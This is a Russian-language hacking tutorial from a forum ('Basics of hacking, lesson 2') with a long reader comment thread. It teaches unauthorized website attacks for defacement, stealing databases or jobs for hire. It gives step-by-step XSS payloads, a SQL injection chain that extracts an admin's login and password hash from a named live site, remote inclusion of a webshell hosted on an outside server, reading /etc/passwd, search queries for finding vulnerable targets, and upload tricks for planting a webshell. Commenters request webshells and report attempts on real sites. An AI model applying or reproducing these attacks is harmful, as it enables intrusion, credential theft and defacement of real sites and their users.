Основы хакерства. Урок 2 — HackZona.Ru

Основы хакерства. Урок 2

Основы хакерства. Урок 2

Тип статьи:
Со старой ХакЗоны.
Источник:
Основы.
Привет читатель. Я решил долго не тянуть и уже в этой статье рассказать о том, какими способами взламывают сайты, какие бывают уязвимости
и зачем собственно взламывать сайты.Что вы узнаете на сегодняшнем уроке:

  • Кто и зачем?

  • Какие бывают уязвимости.

  • Веб шелл, как и что.


Примечание: курсивом будут выделены слова, которые возможно будут вам не понятны. Найти их значение вы сможете в конце статьи.

Кто и зачем?
Вообще под понятием взлома я понимаю несанкционированный доступ к чему-либо.
Мы ломаем веб сайты. Поэтому нам нужно получить доступ к административной панели, либо украсть базу данных сайта, либо просто изменить главную страницу.
Все зависит от такого для чего производится взлом.
Рассмотрим основные мотивы:

Изменения главной странички ради удовольствия && мести. Это называется «дефейс» сайта
Воровство базы данных — это может быть выгодно если мы например взломаем базу данных онлайн шопа (магазина). Либо производится взлом на заказ и заказчику нужна база
Взлом производиться ради повышения прав на сервере.

Теперь поговорим о таком понятии как скрипт кидди.
Скрипт кидди — это люди, как правило не слишком разбирающихся в хаке и программировании.
Т.е. которые не могут самостоятельно найти уязвимость и реализовать ее.
Так как же они взламывают? Они попросту используют чужие наработки.
Допустим скрипт кидди нужно взломать один форум. Он узнает версию форума и идет на багтрак. Находит описание уязвимости и использует ее.
Багтраком называют сайт на котором расположены описание уязвимостей форумов CMS, и где выкладываются эксплоиты.
Либо второй вариант — для развлечения — скрипт кидди опять же идет на багтрак и выбирает уязвимость. Например, он выбирает сплоит для CMS php nuke 7.0.
Далее он идет в поисковик и делает следущюий запрос:
site: php nuke 7.0 — этим он получит список сайтов с установленной CMS Nuke
Далее он просто использует эксплоит. Это кстати называется гугл хакинг.
Как ни крутись, но через период «скрипт кидди» проходил каждый. И придется пройти тебе. Только вот некоторые двигаются дальше, а некоторые останавливаются на этом.

Какие бывают уязвимости?Три самых тривиальных уязвимостей это xss sql injection php include
В каждом уроке я буду рассказывать понемногу про каждую из них.
Сейчас разберем все вкратце не зацикливаясь на деталях уязвимости.

XSS.
Цель у этой уязвимости одна — украсть Cookes файлы.
Итак, сначала из за чего появляются Xss
Происходит все это из-за отсутствия фильтрации входящих данных
Разберем сразу на примере:
www.atlant.ws
Справа мы видим текстовое поля для поиска. Попробуем ввести простой html тег [hr]
И мы увидим линию (в HTML этот тег означает провести линию)
В адресной строке мы видим:
http://www.atlant.ws/?set=search&www=false&query=[hr]

Значит данные передаются GET запросом.
Но от обычного тега опасности никакой. Попробуем ввести простенький javascript сценарий.
www.atlant.ws/?set=search&www=false&query=[script]alert('xss')[/script]
Опа. Появилось сообщение. Значит код выполняется. Т.к. в javascript функция alert() выводит сообщение.
Это называется пассивная xss. Пассивная она потому что нужно произвести какие то действия что бы выполнить код. В нашем случае нужно передать его в переменную запроса (q)
Кроме пассивных xss существует активные.
Опять же пример:
www.addtop.ru/kom.php?id=32
Вводим в комментарии скрипт
[script]alert('xss')[/script]
И отправляем его.
Видим сообщение. Теперь каждый пользователь, который найден на страничку комментариев увидит его.
Чувствуешь разницу? В пассивке нужно производить какие то действия с пользователем. Т.е. нужно передавать ему специальный адрес, по которому он должен пройти.
А в активке нужно, что бы пользователь попросту посетил страницу, в которой уже заключен наш код.
Пока про xss все. Не хочу нагружать тебя информацией. Попробуй поискать активные и пассивные xss.
Так же советую хорошенько изучить, что такое Cookes. В следующем уроке мы разберем, как их воровать. И зачем.
В конце статьи я приведу несколько полезный ссылок на эту тему.

Введение в PHP include.
Если мы найден такую уязвимость то сможем либо читать файлы на сервере либо загрузить вебшелл.
Разберем сначала, что такое веб шелл.
Веб шелл это php скрипт. C помощью него мы сможем изменять файлы сайта или выполнять команды в системе.
В общем, шелл заменяет административную панель. Собственно цель большинства взломов залить веб шелл.
Какими способами? PHP include один из них. Итак, давайте поверхностно разберем уязвимость

Видим на сайте такой url:
www.site.ru?page=home.html

Это значит, что на страничку подгружается файл home.html
А что если попробовать подгузить свой файл? Например, так:
www.site.ru?page=http:/hacker.ru/webshell.php

Так мы пробуем загрузить веб шелл на сайт.
Если мы увидим результат работы webshell.php значит нам круто повезло. И можно считать, что сайт взломан.
Это называется удаленный инклуд. Удаленный потому что нам удалось загрузить скрипт с другого сервера.
Кроме удаленных, инклуды бывают локальные.
В этом случае мы сможем только читать файлы на сервере.
Например, сейчас мы попробуем прочитать файл с именами пользователей системы:
www.site.ru?page=/etc/passwd

Вот, опять же попробуй поискать php include. Советую воспользоваться google:
Inurl:page=

Такой запрос покажет нам сайты, в урле которых присутствует строка page=. Далее попробуй подставить любой набор символов в параметр page. Если появиться ошибка, значит скрипт уязвим
Кстати если найдешь php инклуд, то можно получить xss вот так:
www.site.ru?page=[script]alert(/xss/)[/script]
Это работает во многих случаях.
В следующем уроке я расскажу о том: почему происходит php include, что такое null byte и трудности при чтении файлов.

Введение в SQL Injection
Очень распространенная уязвимость. Суть ее использования заключается в том, что бы вытащить необходимую нам информацию из базы данных. Обычно этими данными является логин и пароль администратора сайта.
Но иногда возможно залить шелл или прочитать файл с помощью sql injection. Об этом поговорим в следующих уроках. А сейчас самые основы
Мы будем разбирать инъекцию при работе с базой данных my sql. Она самая распространенная. Кроме нее часто встречаются mssql, oracle. Каждую нужно взламывать по-своему. Но сейчас mysql.Уязвимость можно найти, если мы увидим что в адресной строке параметру передается числовое значение. Например:
http://www.descom.ch/main.php?id=18646644

Что бы проверить параметр на sql injection обычно подставляют кавычку
http://www.descom.ch/main.php?id=18646644'
либо другие левые символы
Видим ошибку. Понимаем что это mysql.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19


Что бы вытащить информацию нужно найти кол-во полей и определить какие из них читабельны (т.е. из каких колонок можно вынудить инфу)Делается это с помощью конструкции order by.
http://www.descom.ch/main.php?id=18646644+order+by+10/*

Вывод то же самый, значит полей меньше
http://www.descom.ch/main.php?id=18646644+order+by+7/*

Да. Вывод изменился. Значит полей 7.
Теперь нужно получить читабельные поля.
http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,4,5,6,7/*

Вывод: 4,5. Узнать нам это удалось с помощью конструкции union select
У нас есть колонки. Теперь нужно получить информация о базе.
http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/*

Видим что mysql v5 — - В этой версии есть кое какие особенности при взломе, но пока разбирать это не будем и попробуем просто подобрать таблицу.
Делается это так:
http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/+from+таблица/*

таблицу нам нужно подобрать самим. Самые распространенная это user или users. Список часто используемых таблиц можно найти по этой
ссылке
В нашем случае мне удалось узнать, что имя таблицы user.
Теперь можно приступить к выводу информации. Нам нужно достать логин и пароль.
Попробуем:
http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,name,password,6,7+from+user/*

И у нас на экране логин и хеш пароля администратора.
Вот таким не хитрым образом удалось поломать базу.
Кстати здесь тоже имеет место xss:
http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,[script]alert(/xss/)[/script],5,6,7/*


Итак, мы разобрали три основных уязвимости. Я не стал пока копать глубоко, а рассказал только поверхностную информацию, что бы немного вас завлечь. В следуюих уроках
я буду рассказывать о причинах уязвимостей, так же буду приводить куски уязвимых программ. Так что желательно подучить php и mysql
Кстати набор инъекция и инклудов для тренировки ты всегда сможешь найти на форуме хакзоны:
sql inj
php inc

Еще парочка способов загрузить веб шелл.
Как ты наверное уже понял главное это веб шелл. Выше я показывал, как его можно залить с помощью php include. Но это конечно не единственный способ
На множестве сайтов присутствует возможность загрузки каких либо файлов. Уже догадался? Мы без проблем сможем вместо обычного файла подставить веб шелл. Но не все так просто. Иногда скрипт проверяет разрешение.
Допустим нам можно загрузить картинку. Но если вместо нее мы попытаемся залить файл webshell.php скрипт может проверить разрешение и запретить загрузку. Это можно обойти таким способом:
Поменять разрешение на такое:
webshell.php.jpg.

и возможно нам удастся загрузить шелл.
Но бывает, что сайт проверяет не только имя файла, но и его содержимое. Т.е он смотрит картинка это или текст
Для этого можно поступить вот так:
Открыть картинку в любом текстовом редакторе и в конце добавить php скрипт.

Термины, используемые в статье.
Ниже я приведу слова, которые возможно были тебе не понятно по ходу статьи:
Дефейс — замена страницы сайта на свою либо редактирование страницы под собственные нужны. Например «Hacked by вася»
CMS или еще говорят движок-двиг — система управления сайтом.
Эксплоит — сплоит -exploit-xploit — программа автоматически реализующая какую либо уязвимость. По сути, сплоит можно написать почти на любом язык программирования
Cookes файлы которые применяется для сохранения данных на стороне пользователя, на практике обычно используется для:
  • аутентификации пользователя;
  • хранения персональных предпочтений и настроек пользователя;
  • отслеживания состояния сессии доступа пользователя;
  • ведения статистики о пользователях.
Если мы украдем «Куки» администратора сайта и заменим их на свои, то без проблем сможем аутентифицироваться как админ.
В следующей статье я как раз расскажу про воровство Cookes с помощью xss
bugtraq-багтрак — Сайт на котором располагаются эксплоиты и описание уязвимостей в CMS форумах и программном обеспечении.
Google hacking — гугл хакинг — Использование поисковика google для поиска уязвимых стайтов либо для сбора информации о сайте.

Послесловие
Вот и подошел к концу 2 урок. На следущем мы более подробно разберем xss php include и sql injection. Далее я покажу несколько приемов в веб хаке. И в конце мы поговорим об эксплоитах.
Для самообразования можно почитать вот это:
xss
<a href=sql injection www.fssr.ru/hz.php?name=News&file=article&sid=7815>sql injection
<a href=include www.nulled.ws/showthread.php?t=25867>php include

А также
теоретические основы хакинга
Также очень советую почаще посещать багтрак и разбирать уязвимости которые там описываются. На этом пока все. Удачи!
ps все уголковые теги заменены на [ и ]
Нравится
Не нравится

92 комментария

10:38
Если мы увидим результат работы webshell.php значит нам круто повезло. И можно считать, что сайт взломан.

в чем заключаеться результат?? что мы должны увидеть??
00:08
Привет всем ктонибуть знает как найти телефон по IMEIL или еше как нибуть помогите.
01:11
Пока все понятно. =)
21:06
да тут нужна просто зверская память
/.*-!=+
? ? ?
?
(=^-^=)
16:18
залейте плиз кто-нибуть скрипт вебшела или скиньте в txt на почту
16:18
залейте плиз кто-нибуть скрипт вебшела или скиньте в txt на почту
06:30
Теоретически понятно, на уровне сегодня прочитал, завтра забыл, а вот детально понять каждое действие мне к сожалению не удалось :( Возможно потому, что я незнаю mysql, если это так, то былобы не плохо написать "системные" требования мозга для прочтения этой статьи xD
21:18
"Теперь нужно получить читабельные поля. http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,4,5,6,7/*
Вывод: 4,5. Узнать нам это удалось с помощью конструкции union select"
Как вы узнали, что 4 и 5?? у меня выдаёт ошибку, и никаких циферок там нет..
03:29
StraNger подскажи летературу которую желательно было про4итать и изу4ить)? щас изу4аю html ещё с первой главы_) огромное спс) Респект те коро4 написано легко и просто нове4кам таким как я просто супер)
03:55
КРУТО СЕНСЕЙ!:) Хороший ход! По хакер-фене заБОТали:) и правильно!!В конце концов останутся самые упорные и избранные:))) жду не дождусь когда предложишь красную и синию ТАБлЕТКу:)))
04:18
to adves & everybody:
Несомненно хакер-профи.И должен владеть по4ти всем выше перечисленным в первом уроке как самурай своим "катана".Тол6ко не теряйте искру!Ломать нужно играючи:))
(СЕНСЕЮ опять таки благодарность за труды и поддержку нового поколения ;)
04:37
to everybody:
...да кстати чуть не забыл:0 о4ень "вкусная" а главное какая полезная ссыло4ка для обу4ения и практики!!!(правда на английском,сссори:)
http://www.w3schools.com/
17:33
ссылки чет закосячили
вот инфа по
sql inj http://www.fssr.ru/hz.php?name=News&file=article&sid=7815
php include http://sa-sec.org/?p=603
21:15
site.ru - такого сайта нету/
15:35
обесните мне как залить веб шелл:)
16:06
>>>site.ru - такого сайта нету
Ггг) NeoGames, идите дальше играйте в игры. Это пример адреса)
16:51
>обесните мне как залить веб шелл:)
в статье показано как минимум 2 способа.
в следущей еще покажу
18:34
NeoGames дааа.... кулхацкер! :D :D :D Иди хоть детсад то окончи!
12:00
Молодец) Как всегда)
16:17
NeoGames, сам засел блин и критикуешь статьи этого замечательного (подчеркиваю замечательного) автора, а сам ни сном ни духом XDD такого сайта нету))) нимагу!!!
20:04
Когда статьи пишут то дают какие примеры сайтов.
Я игры не играю уже 5 лет.
Та на линуксе игор почти нету.
20:07
Если статьи были бы без недостатков, то не кто бы не посмел критиковать.
Критиковать всегда нужно, чтоб чел всегда лучше писал, а не хуже.
20:09
Если не было тестеров ПО(критиков), то не было хороших прог.
20:09
после последнего сообщения чуть не разбился об системник от смеха.
>Когда статьи пишут то дают какие примеры сайтов.
я дал пример РЕального сайта с xss
>Я игры не играю уже 5 лет.
Т.е. ты хочешь сказать, что за всю свою жизнь ни разу не играл в игры?
>Та на линуксе игор почти нету.
Самый умор. Это вроде такой легкий намек что у тебя стоит линь. )гг может ты с виндо его попутал. винда это синенькая с цветным флажком и кнопкой пуск в левом нижнем углу
20:11
извини конечно если обидел, но честно не смог удержаться
04:19
2neogames: Критику подают в трезвом видe.
21:54
>>>Я игры не играю уже 5 лет.
И сколько же вам лет? Получается вы начали играть в -1 год? )
15:28
охренеть... напали на человека. свобода слова мнения и действия. какждый думает что хочет.... Не ну можно конечно думать молча, а NeoGames? ;)
15:48
вот кстати пример инклуда.с него вам и пишу)))
http://www.dyabola.de/en/indexfrm.htm?page=http://www.hackzona.ru/index.php
05:01
ребят, на NeoGames'a нападаем по одному.
StraNger, молодца. еще разукрась это как-нибудь, а? фичу там интересную, водички немного. а еще лучше попробуй сам написать))))))
00:18
позновательно спс )))
15:41
плиз кто хорошо разбирается во всем этом.помогите и мне)))
05:45
у миня непалучилас с SQL Injection...нашол пару сайтав где выбивала вот ето соабшения ( Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19 )писал дальше кады но нидавала никакова результат((((((((
11:25
класная статья
ХАКЕРЫ где вы хочу научится есть массу вопросов
например подключившись через telnet я так понял упрявлять компом через CMD но я ни как непойму как же я видить буду какие файлы лежат в этой папке вот моё мыло [email protected]
bbj
20:16
Спасибо большое за такие замечательные уроки.
Давно искал такие внятные и понятные статьи про стандартные уязвимости. Буду стараться. Сам я пока что новичок и освоил только взлом через telnet и удаленную установку Radmina. Спасибо, учитель! =) тащи
11:02
Автор , попрежнему респект )) Статьи радуют , опять же надеюсь остальные будут такие как первые 2)
15:37
чета я ничего не понял(((
18:49
Кто очень хорошо понял эту тему обьясните мне подробно начиная с XSS и до конца почти ничего не понял.
23:19
извините я пока 15% понимаю это , и хочу это все понимать
20:43
Эм....Скажите что за хрень?
Захожу на украинский поисковик и что бы не водил пишет обновите тул бар!
Эт ваще чё такое и долхно бы быть так???=)
18:49
такое ощущение, что после первого урока надо было выучить все советуемые языки программирования для того чтобы разобраться в этом уроке! лихо))) что будет дальше?)))
08:34
to larik60: ну не будет же автор тянуть два года пока вы выучите эти языки, а без знания этих языков к практике не перейдешь.
to Warmans: должно выскочит окошко с надписью "xss" и кнопкой "ОК"

to ВСЕ: никто не будет вас учить. Вам могут подсказать, рассказать хитрость, выдать уязвимость, но объяснять вам основы и заниматься "репетиторством" никто не будет. Советую начать изучение с html - 2 недели максимум, затем php - месяц-два зависит от понятливости и логического мышления, а потом Вы будете в состоянии сами выбрать путь.

to StraNger (Автор): Вот все бы так писали как ты, я бы давно стал величайшим хакером на планете =) шутка, конечно. Спасибо за статью всё ясно и понятно. Недавно стал интересоваться хакингом хотя пишу на php уже год.
20:16
to avdes да я с тобой полностью согласен! поэтому сразу после прочтения принялся за изучение C++. просто всем же хочется прочитать эти 5 статей и опп, а мы уже и хакеры))) и все нам уже понятно)) но так не бывает((
18:45
да, кстати, на www.atlant.ws кажись залатали уже указываемую уязвимость...:)
22:48
www.atlant.ws Справа мы видим текстовое поля для поиска. Попробуем ввести простой html тег [hr]
И мы увидим линию (в HTML этот тег означает провести линию)
В адресной строке мы видим:
http://www.atlant.ws/?set=search&www=false&query=[hr]
Я не это увидел,а это!
http://www.atlant.ws/?set=search&cx=partner-pub-9597361933989050%3Afb6bv5-nz90&cof=FORID%3A10&ie=windows-1251&q=%5Bhr%5D&sa=%CF%EE%E8%F1%EA&siteurl=www.atlant.ws%2F
23:06
я так и с этими Xss не розобрался,то что више написонна у меня не получается,javascript эт что?Не чо по сценарии не идет:(((
13:06
StraNger как с вами связатся в сети? Есть вопросы по статье
13:23
ух...пока тяжело))
00:19
Я начиная xss ничего не поняла!!!Кто нить помогите разобраться!!!
17:38
http://www.atlant.ws/?set=search&www=false&query=[script]alert('xss')[/script]
Опа. Появилось сообщение. Значит код выполняется. Т.к. в javascript функция alert() выводит сообщение.
(А какое сообщение должно появиться?)
22:18
Для второго урока сложновато...
23:00
Да тяжело...чесно говоря ничего непонятно...буду очень признателен тому..кто поможет мне вообще с этим всем разобраться))и поставить меня на путь хакерства))) аська 554518157
04:44
я так понимаю будет очень сложно я 5 лет учил 3d-max но это цветочки по сравнению с этим!
21:22
Спасибо большое автору! Статья понятная, познавательная, интересная.Но все же у меня появилосьнесколько вопросов. кому их можно задать?
15:15
пожалуйста кто нибудь мне сможет объяснить подробнее начиная с xss
22:35
Спасибо огромное ;)
zxs
13:27
Про иньекции,труднодохадимо)))для новичков, а в основном всё просто класс,спасибо автору))и хак зоне))за предоставленные матерьялы)))
13:36
прошу пожалуйста кто нибудь объясните мне подробнее. если можно то в картинках
01:02
Авто!
Начать нужно с БЕЗОПАСНОСТИ компа новичка!
(А потом вводить различные коды)
Посвяти этому урок!
:)))
13:59
где???
13:56
Заметка для автора:
По-моему автор перепутал слова. Вместо слова "расширение" написал"разрешение"
вот тут:
Еще парочка способов загрузить веб шелл.
Как ты наверное уже понял главное это веб шелл. Выше я показывал, как его можно залить с помощью php include. Но это конечно не единственный способ
На множестве сайтов присутствует возможность загрузки каких либо файлов. Уже догадался? Мы без проблем сможем вместо обычного файла подставить веб шелл. Но не все так просто. Иногда скрипт проверяет разрешение.
Допустим нам можно загрузить картинку. Но если вместо нее мы попытаемся залить файл webshell.php скрипт может проверить разрешение и запретить загрузку. Это можно обойти таким способом:
Поменять разрешение на такое:
webshell.php.jpg.
и возможно нам удастся загрузить шелл.
Но бывает, что сайт проверяет не только имя файла, но и его содержимое. Т.е он смотрит картинка это или текст
Для этого можно поступить вот так:
Открыть картинку в любом текстовом редакторе и в конце добавить php скрипт.
18:01
я не все понял про xss
03:06
я тоже нехрина непонимаю )))))))))) чё делать то ??мож насомом деле кортинок повпихивате ))8)) но сёравно спс !
04:20
я почти нихрена не понял ктонибудь помагите разобратся
19:43
эх, данный урок прошол с 30% усваемости информации...
00:26
Спасибо конечно за статью, но не все понял.
18:38
читаю и реально осознаю 4то я 4айник, много вкусного а Сенсей реально крут!!!
23:23
обьясните идиоту куда вводить все эти скрипты и так далее,в адрес сылки в верху чтоли?)
03:10
Нда...тож не выходит что-то(
03:17
Эм, у кого вышло, напишите пожалуйста, обьясните чайнику...
20:38
Ещё одна благодарность от меня))
18:54
Разберем сразу на примере:
www.atlant.ws Справа мы видим текстовое поля для поиска. Попробуем ввести простой html тег [hr]
И мы увидим линию (в HTML этот тег означает провести линию)
В адресной строке мы видим:
http://www.atlant.ws/?set=search&www=false&query=[hr]
Значит данные передаются GET запросом.
Но от обычного тега опасности никакой. Попробуем ввести простенький javascript сценарий.
http://www.atlant.ws/?set=search&www=false&query=[script]alert('xss')[/script]
Опа. Появилось сообщение. Значит код выполняется. Т.к. в javascript функция alert() выводит сообщение.
Это называется пассивная xss. Пассивная она потому что нужно произвести какие то действия что бы выполнить код. В нашем случае нужно передать его в переменную запроса (q)


НИЧЕ НЕ ПОНЯТЬ!????(
13:08
Нет, это-то я понимаю, просто не выводит так, как в статье написано. Во втором примере http://www.addtop.ru/kom.php?id=32
даже комментарий со скриптом не отправляется. Simoon, у вас судя по всему с этим о'к, поэтому лучше бы подсказали где ошибка может быть?
15:21
Статья хорошая , но сжатая...не все смогут понять суть дела...
19:41
у меня неполучаеться(((
13:31
У меня в стотье Ведение PHP на каждой сылке видно только

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19

А как узанить пасс и лог я так и не понял ((
21:21
Кажется уязвимости в сайтах исправили) Ищите для экспериментов другие сайты)
23:03
что-то на сайтах уже защита стоит.
мб дайте какой нибудь адрес простеньких русских сайтов для экспериментов новичков?
00:42
Спасибо автору статьи за замечательно подготовленный материал, чувствуется, что человек действительно хочет поделиться своими знаниями и опытом, а не просто "блеснуть" мастерством!
15:26
я пытался разобрать sql injection на примре контакта! - неполучилось!
13:37
В PHP include я вставила название сайта,было написано целая строка букв А .Потом мне пришло сообшение,что файлы загружены.А значит получилось?
21:43
за труды конечно спасибо, но я пока ничегошеньки не понял((
18:31
Спасибо Сенсей=)
22:05
XSS-поподробней надо бы)
15:07
У меня проблема( Помогите, пожалуйста.
Я насчет XSS и указанного сайта. www.atlant.ws - некий "украинский портал без регистрации". Я правильно поняла, что следует ввести [hr] в строку справа под названием "поиск на портале"? Но если я так делаю, то адресная строка получается совсем другая, да и линии я не вижу, открывается гугл поиск (ну, "Результаты 1-10 по запросу [hr]", и все такое).
Что я делаю неправильно? Подскажите...
02:27
У меня такая же проблема, наверное стотья уже устарела
23:55
по поводу xss... вписывать надо не [hr] а <hr> ....скобки перепутали.... и этот украинский сайт по ходу уже защитили от подобных скриптов надо искать другие)
15:29
просидел 2 часа в гугле не удалось подгрузить веб шелл не к одному сайту( та же история с PHP include.может все сайты уже защитили? или я делаю чтото не так... будем пробовать дальше)
03:19
у мну тож все выбило в буквах А но потом пришо сообщение что файл загружон )
11:46
капец))спс)
09:52
кул..статья ток не всё понятно пожалуйста обьясните мне в личку по лучше
22:18
Хорошая статья, спасибо.